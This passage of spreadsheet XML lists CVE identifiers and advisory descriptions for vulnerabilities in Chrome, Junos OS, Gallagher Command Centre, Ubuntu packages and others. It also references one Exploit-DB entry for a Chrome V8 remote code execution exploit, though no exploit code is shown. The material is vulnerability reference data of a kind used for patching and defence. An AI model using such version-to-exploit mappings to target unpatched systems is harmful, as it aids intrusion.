    <t>CVE-2020-16013</t>
  </si>
  <si>
    <t>Inappropriate implementation in V8 in Google Chrome prior to 86.0.4240.198 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-16014</t>
  </si>
  <si>
    <t>Use after free in PPAPI in Google Chrome prior to 87.0.4280.66 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-16015</t>
  </si>
  <si>
    <t>Insufficient data validation in WASM in Google Chrome prior to 87.0.4280.66 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-16016</t>
  </si>
  <si>
    <t>Inappropriate implementation in base in Google Chrome prior to 86.0.4240.193 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-16017</t>
  </si>
  <si>
    <t>Use after free in site isolation in Google Chrome prior to 86.0.4240.198 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-16018</t>
  </si>
  <si>
    <t>Use after free in payments in Google Chrome prior to 87.0.4280.66 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-16019</t>
  </si>
  <si>
    <t>Inappropriate implementation in filesystem in Google Chrome on ChromeOS prior to 87.0.4280.66 allowed a remote attacker who had compromised the browser process to bypass noexec restrictions via a malicious file.</t>
  </si>
  <si>
    <t>CVE-2020-1602</t>
  </si>
  <si>
    <t>When a device using Juniper Network's Dynamic Host Configuration Protocol Daemon (JDHCPD) process on Junos OS or Junos OS Evolved which is configured in relay mode it vulnerable to an attacker sending crafted IPv4 packets who may remotely take over the code execution of the JDHDCP process. This issue affect IPv4 JDHCPD services. This issue affects: Juniper Networks Junos OS: 15.1 versions prior to 15.1R7-S6; 15.1X49 versions prior to 15.1X49-D200; 15.1X53 versions prior to 15.1X53-D592; 16.1 versions prior to 16.1R7-S6; 16.2 versions prior to 16.2R2-S11; 17.1 versions prior to 17.1R2-S11, 17.1R3-S1; 17.2 versions prior to 17.2R2-S8, 17.2R3-S3; 17.3 versions prior to 17.3R3-S6; 17.4 versions prior to 17.4R2-S7, 17.4R3; 18.1 versions prior to 18.1R3-S8; 18.2 versions prior to 18.2R3-S2; 18.2X75 versions prior to 18.2X75-D60; 18.3 versions prior to 18.3R1-S6, 18.3R2-S2, 18.3R3; 18.4 versions prior to 18.4R1-S5, 18.4R2-S3, 18.4R3; 19.1 versions prior to 19.1R1-S3, 19.1R2; 19.2 versions prior to 19.2R1-S3, 19.2R2*. and All versions prior to 19.3R1 on Junos OS Evolved. This issue do not affect versions of Junos OS prior to 15.1, or JDHCPD operating as a local server in non-relay mode.</t>
  </si>
  <si>
    <t>CVE-2020-16020</t>
  </si>
  <si>
    <t>Inappropriate implementation in cryptohome in Google Chrome on ChromeOS prior to 87.0.4280.66 allowed a remote attacker who had compromised the browser process to bypass discretionary access control via a malicious file.</t>
  </si>
  <si>
    <t>CVE-2020-16021</t>
  </si>
  <si>
    <t>Race in image burner in Google Chrome on ChromeOS prior to 87.0.4280.66 allowed a remote attacker who had compromised the browser process to perform OS-level privilege escalation via a malicious file.</t>
  </si>
  <si>
    <t>CVE-2020-16022</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in networking in Google Chrome prior to 87.0.4280.66 allowed a remote attacker to potentially bypass firewall controls via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-16023</t>
  </si>
  <si>
    <t>Use after free in WebCodecs in Google Chrome prior to 87.0.4280.66 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-16024</t>
  </si>
  <si>
    <t>Heap buffer overflow in UI in Google Chrome prior to 87.0.4280.66 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-16025</t>
  </si>
  <si>
    <t>Heap buffer overflow in clipboard in Google Chrome prior to 87.0.4280.66 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-16026</t>
  </si>
  <si>
    <t>Use after free in WebRTC in Google Chrome prior to 87.0.4280.66 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-16027</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in developer tools in Google Chrome prior to 87.0.4280.66 allowed an attacker who convinced a user to install a malicious extension to obtain potentially sensitive information from the user's disk via a crafted Chrome Extension.</t>
  </si>
  <si>
    <t>CVE-2020-16028</t>
  </si>
  <si>
    <t>Heap buffer overflow in WebRTC in Google Chrome prior to 87.0.4280.66 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-16029</t>
  </si>
  <si>
    <t>Inappropriate implementation in PDFium in Google Chrome prior to 87.0.4280.66 allowed a remote attacker to bypass navigation restrictions via a crafted PDF file.</t>
  </si>
  <si>
    <t>CVE-2020-1603</t>
  </si>
  <si>
    <t>Specific IPv6 packets sent by clients processed by the Routing Engine (RE) are improperly handled. These IPv6 packets are designed to be blocked by the RE from egressing the RE. Instead, the RE allows these specific IPv6 packets to egress the RE, at which point a mbuf memory leak occurs within the Juniper Networks Junos OS device. This memory leak eventually leads to a kernel crash (vmcore), or the device hanging and requiring a power cycle to restore service, creating a Denial of Service (DoS) condition. During the time where mbufs are rising, yet not fully filled, some traffic from client devices may begin to be black holed. To be black holed, this traffic must match the condition where this traffic must be processed by the RE. Continued receipt and attempted egress of these specific IPv6 packets from the Routing Engine (RE) will create an extended Denial of Service (DoS) condition. Scenarios which have been observed are: 1. In a single chassis, single RE scenario, the device will hang without vmcore, or a vmcore may occur and then hang. In this scenario the device needs to be power cycled. 2. In a single chassis, dual RE scenario, the device master RE will fail over to the backup RE. In this scenario, the master and the backup REs need to be reset from time to time when they vmcore. There is no need to power cycle the device. 3. In a dual chassis, single RE scenario, the device will hang without vmcore, or a vmcore may occur and then hang. In this scenario, the two chassis' design relies upon some type of network level redundancy - VRRP, GRES, NSR, etc. - 3.a In a commanded switchover, where nonstop active routing (NSR) is enabled no session loss is observed. 4. In a dual chassis, dual chassis scenario, rely upon the RE to RE failover as stated in the second scenario. In the unlikely event that the device does not switch RE to RE gracefully, then the fallback position is to the network level services scenario in the third scenario. This issue affects: Juniper Networks Junos OS 16.1 versions prior to 16.1R7-S6; 16.1 version 16.1X70-D10 and later; 16.2 versions prior to 16.2R2-S11; 17.1 versions prior to 17.1R2-S11, 17.1R3-S1; 17.2 versions prior to 17.2R1-S9, 17.2R2-S8, 17.2R3-S3; 17.3 versions prior to 17.3R3-S6; 17.4 versions prior to 17.4R2-S9, 17.4R3; 18.1 versions prior to 18.1R3-S7; 18.2 versions prior to 18.2R3-S2; 18.2X75 versions prior to 18.2X75-D50, 18.2X75-D410; 18.3 versions prior to 18.3R1-S6, 18.3R2-S2, 18.3R3; 18.4 versions prior to 18.4R1-S6, 18.4R2-S2, 18.4R3; 19.1 versions prior to 19.1R1-S3, 19.1R2; 19.2 versions prior to 19.2R1-S2, 19.2R2. This issue does not affect releases prior to Junos OS 16.1R1.</t>
  </si>
  <si>
    <t>CVE-2020-16030</t>
  </si>
  <si>
    <t>Insufficient data validation in Blink in Google Chrome prior to 87.0.4280.66 allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-16031</t>
  </si>
  <si>
    <t>Insufficient data validation in UI in Google Chrome prior to 87.0.4280.66 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-16032</t>
  </si>
  <si>
    <t>Insufficient data validation in sharing in Google Chrome prior to 87.0.4280.66 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-16033</t>
  </si>
  <si>
    <t>Inappropriate implementation in WebUSB in Google Chrome prior to 87.0.4280.66 allowed a remote attacker to spoof security UI via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-16034</t>
  </si>
  <si>
    <t>Inappropriate implementation in WebRTC in Google Chrome prior to 87.0.4280.66 allowed a local attacker to bypass policy restrictions via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-16035</t>
  </si>
  <si>
    <t>Insufficient data validation in cros-disks in Google Chrome on ChromeOS prior to 87.0.4280.66 allowed a remote attacker who had compromised the browser process to bypass noexec restrictions via a malicious file.</t>
  </si>
  <si>
    <t>CVE-2020-16036</t>
  </si>
  <si>
    <t>Inappropriate implementation in cookies in Google Chrome prior to 87.0.4280.66 allowed a remote attacker to bypass cookie restrictions via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-16037</t>
  </si>
  <si>
    <t>Use after free in clipboard in Google Chrome prior to 87.0.4280.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-16038</t>
  </si>
  <si>
    <t>Use after free in media in Google Chrome on OS X prior to 87.0.4280.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-16039</t>
  </si>
  <si>
    <t>Use after free in extensions in Google Chrome prior to 87.0.4280.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-1604</t>
  </si>
  <si>
    <t>On EX4300, EX4600, QFX3500, and QFX5100 Series, a vulnerability in the IP firewall filter component may cause the firewall filter evaluation of certain packets to fail. This issue only affects firewall filter evaluation of certain packets destined to the device Routing Engine (RE). This issue does not affect the Layer 2 firewall filter evaluation nor does it affect the Layer 3 firewall filter evaluation destined to connected hosts. This issue may occur when evaluating both IPv4 or IPv6 packets. This issue affects Juniper Networks Junos OS: 14.1X53 versions prior to 14.1X53-D12 on QFX5100 Series and EX4600 Series; 14.1X53 versions prior to 14.1X53-D52 on QFX3500 Series; 14.1X53 versions prior to 14.1X53-D48 on EX4300 Series; 15.1 versions prior to 15.1R7-S3 on EX4300 Series; 16.1 versions prior to 16.1R7 on EX4300 Series; 17.1 versions prior to 17.1R3 on EX4300 Series; 17.2 versions prior to 17.2R3 on EX4300 Series; 17.3 versions prior to 17.3R2-S5, 17.3R3 on EX4300 Series; 17.4 versions prior to 17.4R2 on EX4300 Series; 18.1 versions prior to 18.1R3 on EX4300 Series; 18.2 versions prior to 18.2R2 on EX4300 Series.</t>
  </si>
  <si>
    <t>exploits/multiple/remote/49745.js</t>
  </si>
  <si>
    <t>Google Chrome 86.0.4240 V8 - Remote Code Execution</t>
  </si>
  <si>
    <t>CVE-2020-16040</t>
  </si>
  <si>
    <t>Insufficient data validation in V8 in Google Chrome prior to 87.0.4280.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-16041</t>
  </si>
  <si>
    <t>Out of bounds read in networking in Google Chrome prior to 87.0.4280.88 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-16042</t>
  </si>
  <si>
    <t>Uninitialized Use in V8 in Google Chrome prior to 87.0.4280.88 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-16043</t>
  </si>
  <si>
    <t>Insufficient data validation in networking in Google Chrome prior to 87.0.4280.141 allowed a remote attacker to bypass discretionary access control via malicious network traffic.</t>
  </si>
  <si>
    <t>CVE-2020-16044</t>
  </si>
  <si>
    <t>Use after free in WebRTC in Google Chrome prior to 88.0.4324.96 allowed a remote attacker to potentially exploit heap corruption via a crafted SCTP packet.</t>
  </si>
  <si>
    <t>CVE-2020-16045</t>
  </si>
  <si>
    <t>Use after Free in Payments in Google Chrome on Android prior to 87.0.4280.66 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-16046</t>
  </si>
  <si>
    <t>Script injection in iOSWeb in Google Chrome on iOS prior to 84.0.4147.105 allowed a remote attacker to execute arbitrary code via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-16048</t>
  </si>
  <si>
    <t>Out of bounds read in ANGLE allowed a remote attacker to obtain sensitive data via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-1605</t>
  </si>
  <si>
    <t>When a device using Juniper Network's Dynamic Host Configuration Protocol Daemon (JDHCPD) process on Junos OS or Junos OS Evolved which is configured in relay mode it vulnerable to an attacker sending crafted IPv4 packets who may then arbitrarily execute commands as root on the target device. This issue affects IPv4 JDHCPD services. This issue affects: Juniper Networks Junos OS: 15.1 versions prior to 15.1R7-S6; 15.1X49 versions prior to 15.1X49-D200; 15.1X53 versions prior to 15.1X53-D592; 16.1 versions prior to 16.1R7-S6; 16.2 versions prior to 16.2R2-S11; 17.1 versions prior to 17.1R2-S11, 17.1R3-S1; 17.2 versions prior to 17.2R2-S8, 17.2R3-S3; 17.3 versions prior to 17.3R3-S6; 17.4 versions prior to 17.4R2-S7, 17.4R3; 18.1 versions prior to 18.1R3-S8; 18.2 versions prior to 18.2R3-S2; 18.2X75 versions prior to 18.2X75-D60; 18.3 versions prior to 18.3R1-S6, 18.3R2-S2, 18.3R3; 18.4 versions prior to 18.4R1-S5, 18.4R2-S3, 18.4R3; 19.1 versions prior to 19.1R1-S3, 19.1R2; 19.2 versions prior to 19.2R1-S3, 19.2R2*. and All versions prior to 19.3R1 on Junos OS Evolved. This issue do not affect versions of Junos OS prior to 15.1, or JDHCPD operating as a local server in non-relay mode.</t>
  </si>
  <si>
    <t>CVE-2020-1606</t>
  </si>
  <si>
    <t>A path traversal vulnerability in the Juniper Networks Junos OS device may allow an authenticated J-web user to read files with 'world' readable permission and delete files with 'world' writeable permission. This issue does not affect system files that can be accessed only by root user. This issue affects Juniper Networks Junos OS: 12.3 versions prior to 12.3R12-S13; 12.3X48 versions prior to 12.3X48-D85 on SRX Series; 14.1X53 versions prior to 14.1X53-D51; 15.1F6 versions prior to 15.1F6-S13; 15.1 versions prior to 15.1R7-S5; 15.1X49 versions prior to 15.1X49-D180 on SRX Series; 15.1X53 versions prior to 15.1X53-D238 on QFX5200/QFX5110 Series; 16.1 versions prior to 16.1R4-S13, 16.1R7-S5; 16.2 versions prior to 16.2R2-S10; 17.1 versions prior to 17.1R3-S1; 17.2 versions prior to 17.2R1-S9, 17.2R3-S2; 17.3 versions prior to 17.3R2-S5, 17.3R3-S5; 17.4 versions prior to 17.4R2-S9, 17.4R3; 18.1 versions prior to 18.1R3-S8; 18.2 versions prior to 18.2R3; 18.3 versions prior to 18.3R2-S3, 18.3R3; 18.4 versions prior to 18.4R2; 19.1 versions prior to 19.1R1-S4, 19.1R2.</t>
  </si>
  <si>
    <t>CVE-2020-1607</t>
  </si>
  <si>
    <t>Insufficient Cross-Site Scripting (XSS) protection in J-Web may potentially allow a remote attacker to inject web script or HTML, hijack the target user's J-Web session and perform administrative actions on the Junos device as the targeted user. This issue affects Juniper Networks Junos OS 12.3 versions prior to 12.3R12-S15; 12.3X48 versions prior to 12.3X48-D86, 12.3X48-D90 on SRX Series; 14.1X53 versions prior to 14.1X53-D51 on EX and QFX Series; 15.1F6 versions prior to 15.1F6-S13; 15.1 versions prior to 15.1R7-S5; 15.1X49 versions prior to 15.1X49-D181, 15.1X49-D190 on SRX Series; 15.1X53 versions prior to 15.1X53-D238 on QFX5200/QFX5110 Series; 15.1X53 versions prior to 15.1X53-D592 on EX2300/EX3400 Series; 16.1 versions prior to 16.1R4-S13, 16.1R7-S5; 16.2 versions prior to 16.2R2-S10; 17.1 versions prior to 17.1R2-S11, 17.1R3-S1; 17.2 versions prior to 17.2R1-S9, 17.2R3-S2; 17.3 versions prior to 17.3R2-S5, 17.3R3-S5; 17.4 versions prior to 17.4R2-S6, 17.4R3; 18.1 versions prior to 18.1R3-S7; 18.2 versions prior to 18.2R2-S5, 18.2R3; 18.3 versions prior to 18.3R1-S6, 18.3R2-S1, 18.3R3; 18.4 versions prior to 18.4R1-S5, 18.4R2; 19.1 versions prior to 19.1R1-S2, 19.1R2.</t>
  </si>
  <si>
    <t>CVE-2020-1608</t>
  </si>
  <si>
    <t>Receipt of a specific MPLS or IPv6 packet on the core facing interface of an MX Series device configured for Broadband Edge (BBE) service may trigger a kernel crash (vmcore), causing the device to reboot. The issue is specific to the processing of packets destined to BBE clients connected to MX Series subscriber management platforms. This issue affects MX Series running Juniper Networks Junos OS: 17.2 versions starting from17.2R2-S6, 17.2R3 and later releases, prior to 17.2R3-S3; 17.3 versions starting from 17.3R2-S4, 17.3R3-S2 and later releases, prior to 17.3R2-S5, 17.3R3-S5; 17.4 versions starting from 17.4R2 and later releases, prior to 17.4R2-S7,17.4R3; 18.1 versions starting from 18.1R2-S3, 18.1R3 and later releases, prior to 18.1R3-S6; 18.2 versions starting from18.2R1-S1, 18.2R2 and later releases, prior to 18.2R3-S2; 18.2X75 versions prior to 18.2X75-D51, 18.2X75-D60; 18.3 versions prior to 18.3R3; 18.4 versions prior to 18.4R2; 19.1 versions prior to 19.1R1-S3, 19.1R2; 19.2 versions prior to 19.2R1-S2, 19.2R2. This issue does not affect Juniper Networks Junos OS versions prior to 17.2R2-S6.</t>
  </si>
  <si>
    <t>CVE-2020-16087</t>
  </si>
  <si>
    <t>An issue was discovered in Zalo.exe in VNG Zalo Desktop 19.8.1.0. An attacker can run arbitrary commands on a remote Windows machine running the Zalo client by sending the user of the device a crafted file.</t>
  </si>
  <si>
    <t>CVE-2020-16088</t>
  </si>
  <si>
    <t>iked in OpenIKED, as used in OpenBSD through 6.7, allows authentication bypass because ca.c has the wrong logic for checking whether a public key matches.</t>
  </si>
  <si>
    <t>CVE-2020-1609</t>
  </si>
  <si>
    <t>When a device using Juniper Network's Dynamic Host Configuration Protocol Daemon (JDHCPD) process on Junos OS or Junos OS Evolved which is configured in relay mode it vulnerable to an attacker sending crafted IPv6 packets who may then arbitrarily execute commands as root on the target device. This issue affects IPv6 JDHCPD services. This issue affects: Juniper Networks Junos OS: 15.1 versions prior to 15.1R7-S6; 15.1X49 versions prior to 15.1X49-D200; 15.1X53 versions prior to 15.1X53-D592; 16.1 versions prior to 16.1R7-S6; 16.2 versions prior to 16.2R2-S11; 17.1 versions prior to 17.1R2-S11, 17.1R3-S1; 17.2 versions prior to 17.2R2-S8, 17.2R3-S3; 17.3 versions prior to 17.3R3-S6; 17.4 versions prior to 17.4R2-S7, 17.4R3; 18.1 versions prior to 18.1R3-S8; 18.2 versions prior to 18.2R3-S2; 18.2X75 versions prior to 18.2X75-D60; 18.3 versions prior to 18.3R1-S6, 18.3R2-S2, 18.3R3; 18.4 versions prior to 18.4R1-S5, 18.4R2-S3, 18.4R3; 19.1 versions prior to 19.1R1-S3, 19.1R2; 19.2 versions prior to 19.2R1-S3, 19.2R2*. and All versions prior to 19.3R1 on Junos OS Evolved. This issue do not affect versions of Junos OS prior to 15.1, or JDHCPD operating as a local server in non-relay mode.</t>
  </si>
  <si>
    <t>CVE-2020-16092</t>
  </si>
  <si>
    <t>In QEMU through 5.0.0, an assertion failure can occur in the network packet processing. This issue affects the e1000e and vmxnet3 network devices. A malicious guest user/process could use this flaw to abort the QEMU process on the host, resulting in a denial of service condition in net_tx_pkt_add_raw_fragment in hw/net/net_tx_pkt.c.</t>
  </si>
  <si>
    <t>CVE-2020-16093</t>
  </si>
  <si>
    <t>In LemonLDAP::NG (aka lemonldap-ng) through 2.0.8, validity of the X.509 certificate is not checked by default when connecting to remote LDAP backends, because the default configuration of the Net::LDAPS module for Perl is used.</t>
  </si>
  <si>
    <t>CVE-2020-16094</t>
  </si>
  <si>
    <t>In imap_scan_tree_recursive in Claws Mail through 3.17.6, a malicious IMAP server can trigger stack consumption because of unlimited recursion into subdirectories during a rebuild of the folder tree.</t>
  </si>
  <si>
    <t>CVE-2020-16095</t>
  </si>
  <si>
    <t>The dlf (aka Kitodo.Presentation) extension before 3.1.2 for TYPO3 allows XSS.</t>
  </si>
  <si>
    <t>CVE-2020-16096</t>
  </si>
  <si>
    <t>In Gallagher Command Centre versions 8.10 prior to 8.10.1134(MR4), 8.00 prior to 8.00.1161(MR5), 7.90 prior to 7.90.991(MR5), 7.80 prior to 7.80.960(MR2), 7.70 and earlier, any operator account has access to all data that would be replicated if the system were to be (or is) attached to a multi-server environment. This can include plain text credentials for DVR systems and card details used for physical access/alarm/perimeter components.</t>
  </si>
  <si>
    <t>CVE-2020-16097</t>
  </si>
  <si>
    <t>On controllers running versions of v8.20 prior to vCR8.20.200221b (distributed in v8.20.1093(MR2)), v8.10 prior to vGR8.10.179 (distributed in v8.10.1211(MR5)), v8.00 prior to vGR8.00.165 (Distributed in v8.00.1228(MR6)), v7.90 prior to vGR7.90.165 (distributed in v7.90.1038(MRX)), v7.80 or earlier, It is possible to retrieve site keys used for securing MIFARE Plus and Desfire using debug ports on T Series readers.</t>
  </si>
  <si>
    <t>CVE-2020-16098</t>
  </si>
  <si>
    <t>It is possible to enumerate access card credentials via an unauthenticated network connection to the server in versions of Command Centre v8.20 prior to v8.20.1166(MR3), versions of 8.10 prior to v8.10.1211(MR5), versions of 8.00 prior to v8.00.1228(MR6), all versions of 7.90 and earlier. These credentials can then be used to encode low security cards to be used by the system where insecure card technologies are supported.</t>
  </si>
  <si>
    <t>CVE-2020-16099</t>
  </si>
  <si>
    <t>In Gallagher Command Centre v8.20 prior to v8.20.1093(MR2) it is possible to create Guard Tour events that when accessed via things like reporting cause clients to temporarily hang or disconnect.</t>
  </si>
  <si>
    <t>CVE-2020-16100</t>
  </si>
  <si>
    <t>It is possible for an unauthenticated remote DCOM websocket connection to crash the Command Centre service's DCOM websocket thread due to improper shutdown of closed websocket connections, preventing it from accepting future DCOM websocket (Configuration Client) connections. Affected versions are v8.20 prior to v8.20.1166(MR3), v8.10 prior to v8.10.1211(MR5), v8.00 prior to v8.00.1228(MR6), all versions of 7.90 and earlier.</t>
  </si>
  <si>
    <t>CVE-2020-16101</t>
  </si>
  <si>
    <t>It is possible for an unauthenticated remote DCOM websocket connection to crash the Command Centre service due to an out-of-bounds buffer access. Affected versions are v8.20 prior to v8.20.1166(MR3), v8.10 prior to v8.10.1211(MR5), v8.00 prior to v8.00.1228(MR6), all versions of 7.90 and earlier.</t>
  </si>
  <si>
    <t>CVE-2020-16102</t>
  </si>
  <si>
    <t>Improper Authentication vulnerability in Gallagher Command Centre Server allows an unauthenticated remote attacker to create items with invalid configuration, potentially causing the server to crash and fail to restart. This issue affects: Gallagher Command Centre 8.30 versions prior to 8.30.1299(MR2); 8.20 versions prior to 8.20.1218(MR4); 8.10 versions prior to 8.10.1253(MR6); 8.00 versions prior to 8.00.1252(MR7); version 7.90 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2020-16103</t>
  </si>
  <si>
    <t>Type confusion in Gallagher Command Centre Server allows a remote attacker to crash the server or possibly cause remote code execution. This issue affects: Gallagher Command Centre 8.30 versions prior to 8.30.1236(MR1); 8.20 versions prior to 8.20.1166(MR3); 8.10 versions prior to 8.10.1211(MR5); version 8.00 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2020-16104</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in Enterprise Data Interface of Gallagher Command Centre allows a remote attacker with 'Edit Enterprise Data Interfaces' privilege to execute arbitrary SQL against a third party database if EDI is configured to import data from this database. This issue affects: Gallagher Command Centre 8.30 versions prior to 8.30.1236(MR1); 8.20 versions prior to 8.20.1166(MR3); 8.10 versions prior to 8.10.1211(MR5); 8.00 versions prior to 8.00.1228(MR6); version 7.90 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2020-1611</t>
  </si>
  <si>
    <t>A Local File Inclusion vulnerability in Juniper Networks Junos Space allows an attacker to view all files on the target when the device receives malicious HTTP packets. This issue affects: Juniper Networks Junos Space versions prior to 19.4R1.</t>
  </si>
  <si>
    <t>CVE-2020-16116</t>
  </si>
  <si>
    <t>In kerfuffle/jobs.cpp in KDE Ark before 20.08.0, a crafted archive can install files outside the extraction directory via ../ directory traversal.</t>
  </si>
  <si>
    <t>CVE-2020-16117</t>
  </si>
  <si>
    <t>In GNOME evolution-data-server before 3.35.91, a malicious server can crash the mail client with a NULL pointer dereference by sending an invalid (e.g., minimal) CAPABILITY line on a connection attempt. This is related to imapx_free_capability and imapx_connect_to_server.</t>
  </si>
  <si>
    <t>CVE-2020-16118</t>
  </si>
  <si>
    <t>In GNOME Balsa before 2.6.0, a malicious server operator or man in the middle can trigger a NULL pointer dereference and client crash by sending a PREAUTH response to imap_mbox_connect in libbalsa/imap/imap-handle.c.</t>
  </si>
  <si>
    <t>CVE-2020-16119</t>
  </si>
  <si>
    <t>Use-after-free vulnerability in the Linux kernel exploitable by a local attacker due to reuse of a DCCP socket with an attached dccps_hc_tx_ccid object as a listener after being released. Fixed in Ubuntu Linux kernel 5.4.0-51.56, 5.3.0-68.63, 4.15.0-121.123, 4.4.0-193.224, 3.13.0.182.191 and 3.2.0-149.196.</t>
  </si>
  <si>
    <t>CVE-2020-16120</t>
  </si>
  <si>
    <t>Overlayfs did not properly perform permission checking when copying up files in an overlayfs and could be exploited from within a user namespace, if, for example, unprivileged user namespaces were allowed. It was possible to have a file not readable by an unprivileged user to be copied to a mountpoint controlled by the user, like a removable device. This was introduced in kernel version 4.19 by commit d1d04ef ("ovl: stack file ops"). This was fixed in kernel version 5.8 by commits 56230d9 ("ovl: verify permissions in ovl_path_open()"), 48bd024 ("ovl: switch to mounter creds in readdir") and 05acefb ("ovl: check permission to open real file"). Additionally, commits 130fdbc ("ovl: pass correct flags for opening real directory") and 292f902 ("ovl: call secutiry hook in ovl_real_ioctl()") in kernel 5.8 might also be desired or necessary. These additional commits introduced a regression in overlay mounts within user namespaces which prevented access to files with ownership outside of the user namespace. This regression was mitigated by subsequent commit b6650da ("ovl: do not fail because of O_NOATIMEi") in kernel 5.11.</t>
  </si>
  <si>
    <t>CVE-2020-16121</t>
  </si>
  <si>
    <t>PackageKit provided detailed error messages to unprivileged callers that exposed information about file presence and mimetype of files that the user would be unable to determine on its own.</t>
  </si>
  <si>
    <t>CVE-2020-16122</t>
  </si>
  <si>
    <t>PackageKit's apt backend mistakenly treated all local debs as trusted. The apt security model is based on repository trust and not on the contents of individual files. On sites with configured PolicyKit rules this may allow users to install malicious packages.</t>
  </si>
  <si>
    <t>CVE-2020-16123</t>
  </si>
  <si>
    <t>An Ubuntu-specific patch in PulseAudio created a race condition where the snap policy module would fail to identify a client connection from a snap as coming from a snap if SCM_CREDENTIALS were missing, allowing the snap to connect to PulseAudio without proper confinement. This could be exploited by an attacker to expose sensitive information. Fixed in 1:13.99.3-1ubuntu2, 1:13.99.2-1ubuntu2.1, 1:13.99.1-1ubuntu3.8, 1:11.1-1ubuntu7.11, and 1:8.0-0ubuntu3.15.</t>
  </si>
  <si>
    <t>CVE-2020-16124</t>
  </si>
  <si>
    <t>Integer Overflow or Wraparound vulnerability in the XML RPC library of OpenRobotics ros_comm communications packages allows unauthenticated network traffic to cause unexpected behavior. This issue affects: OpenRobotics ros_comm communications packages Noetic and prior versions. Fixed in https://github.com/ros/ros_comm/pull/2065.</t>
  </si>
  <si>
    <t>CVE-2020-16125</t>
  </si>
  <si>
    <t>gdm3 versions before 3.36.2 or 3.38.2 would start gnome-initial-setup if gdm3 can't contact the accountservice service via dbus in a timely manner; on Ubuntu (and potentially derivatives) this could be be chained with an additional issue that could allow a local user to create a new privileged account.</t>
  </si>
  <si>
    <t>CVE-2020-16126</t>
  </si>
  <si>
    <t>An Ubuntu-specific modification to AccountsService in versions before 0.6.55-0ubuntu13.2, among other earlier versions, improperly dropped the ruid, allowing untrusted users to send signals to AccountService, thus stopping it from handling D-Bus messages in a timely fashion.</t>
  </si>
  <si>
    <t>CVE-2020-16127</t>
  </si>
  <si>
    <t>An Ubuntu-specific modification to AccountsService in versions before 0.6.55-0ubuntu13.2, among other earlier versions, would perform unbounded read operations on user-controlled ~/.pam_environment files, allowing an infinite loop if /dev/zero is symlinked to this location.</t>
  </si>
  <si>
    <t>CVE-2020-16128</t>
  </si>
  <si>
    <t>The aptdaemon DBus interface disclosed file existence disclosure by setting Terminal/DebconfSocket properties, aka GHSL-2020-192 and GHSL-2020-196. This affected versions prior to 1.1.1+bzr982-0ubuntu34.1, 1.1.1+bzr982-0ubuntu32.3, 1.1.1+bzr982-0ubuntu19.5, 1.1.1+bzr982-0ubuntu14.5.</t>
  </si>
  <si>
    <t>CVE-2020-1613</t>
  </si>
  <si>
    <t>A vulnerability in the BGP FlowSpec implementation may cause a Juniper Networks Junos OS device to terminate an established BGP session upon receiving a specific BGP FlowSpec advertisement. The BGP NOTIFICATION message that terminates an established BGP session is sent toward the peer device that originally sent the specific BGP FlowSpec advertisement. This specific BGP FlowSpec advertisement received from a BGP peer might get propagated from a Junos OS device running the fixed release to another device that is vulnerable causing BGP session termination downstream. This issue affects IPv4 and IPv6 BGP FlowSpec deployment. This issue affects Juniper Networks Junos OS: 12.3; 12.3X48 on SRX Series; 14.1X53 on EX and QFX Series; 15.1 versions prior to 15.1R7-S5; 15.1F versions prior to 15.1F6-S13; 15.1X49 versions prior to 15.1X49-D180 on SRX Series; 15.1X53 versions prior to 15.1X53-D238 on QFX5200/QFX5110; 15.1X53 versions prior to 15.1X53-D497 on NFX Series; 15.1X53 versions prior to 15.1X53-D592 on EX2300/EX3400; 